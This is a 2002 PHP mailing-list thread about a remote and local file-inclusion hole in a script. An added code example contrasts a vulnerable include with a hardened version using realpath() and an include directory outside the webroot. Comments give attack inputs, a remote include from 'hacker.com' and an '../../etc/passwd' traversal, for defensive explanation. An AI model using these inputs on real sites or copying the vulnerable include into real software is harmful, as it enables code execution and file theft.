The easiest and safest way to get around this problem is to place all your include files outside of your webroot directory (say one level up), so they will be accessible locally via includes, but NOT accessible via http.
HTH, Stas

----- Original Message -----
From: "John Wards" <[EMAIL PROTECTED]>
To: "PHP" <[EMAIL PROTECTED]>
Sent: Friday, October 04, 2002 10:58 AM
Subject: Re: [PHP] Umm... Uh-oh

Erm...... would that allow hackers access? Say I have a database include file; would hackers be able to get access to my database like this? (include('http://mysite.com/datainc.php');) I hope bloody not!!! If so, how on earth do I get round that!

John

On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote:
> Use realpath() to check the path. I also suspect your script is
> vulnerable to cross-site includes
> (include('http://hacker.com/script.inc');)
>
> Rick Beckman wrote:
> > Okay, I was mistaken... There is a gaping security hole in my simple li'l
> > script... How do I modify it to only accept files from a certain path? I
> > want the URL format to be script.php?call=1 where "1" is the called file
> > in the /includes/ directory. Just when I get optimistic I leave the
> > entire system exposed. Yeah, that fits with my luck. :-)

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
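The hole Rick describes, next to a hardened version that combines Marek's realpath() check with Stas's advice to keep the include files outside the webroot. This is an added example and not code posted by anyone in the thread. It assumes PHP 7.1 or later, that script.php sits in the webroot, and that the include files live one level up in ../includes (so ?call=1 maps to ../includes/1.php); those paths are illustrative.

```php
<?php
// Added example, not code from the thread.
// Assumptions: PHP 7.1+, this file is in the webroot, include files are
// one level above it in ../includes (e.g. ../includes/1.php).

// --- Vulnerable form (do not use) ---------------------------------------
// script.php?call=1 was meant to load includes/1.php, but $call comes
// straight from the query string, so an attacker can also send:
//   ?call=http://hacker.com/script.inc   (remote code, if allow_url_include is on)
//   ?call=../../../etc/passwd            (any file the web server can read)
function vulnerable_include(string $call): void
{
    include 'includes/' . $call;
}

// --- Hardened form ------------------------------------------------------
// Canonical absolute path of the include directory, resolved once.
// realpath() returns false if the directory is missing; treat that as fatal.
$includeDir = realpath(__DIR__ . '/../includes');
if ($includeDir === false) {
    http_response_code(500);
    exit('include directory not found');
}

/**
 * Map the user-supplied "call" value to a file inside $includeDir,
 * or return null if it is not acceptable.
 */
function resolve_include(string $includeDir, string $call): ?string
{
    // 1. Allow only a short alphanumeric token. This alone rejects "..",
    //    "/", "\\", "http://", NUL bytes and the empty string.
    if (!preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $call)) {
        return null;
    }

    // 2. Append the extension ourselves so the caller cannot choose it,
    //    then canonicalize. realpath() resolves symlinks and "..", and
    //    returns false if the file does not exist.
    $candidate = realpath($includeDir . DIRECTORY_SEPARATOR . $call . '.php');
    if ($candidate === false) {
        return null;
    }

    // 3. Defence in depth: the resolved path must still start with the
    //    include directory. This catches a symlink inside includes/ that
    //    points elsewhere, which the regex in step 1 cannot see.
    $prefix = $includeDir . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $candidate;
}

$file = resolve_include($includeDir, $_GET['call'] ?? '');
if ($file === null) {
    http_response_code(404);
    exit('No such page');
}
include $file;
```

Keeping the directory outside the webroot, as Stas suggests, adds a second property the path check alone does not give: even if a bug elsewhere let someone request the include files directly over HTTP, the web server has nothing to serve at that location, so the raw source (and any database credentials in it) never leaves the box. On PHP 5.2 and later, setting allow_url_include=Off in php.ini is a further layer that stops include() from fetching remote URLs at all.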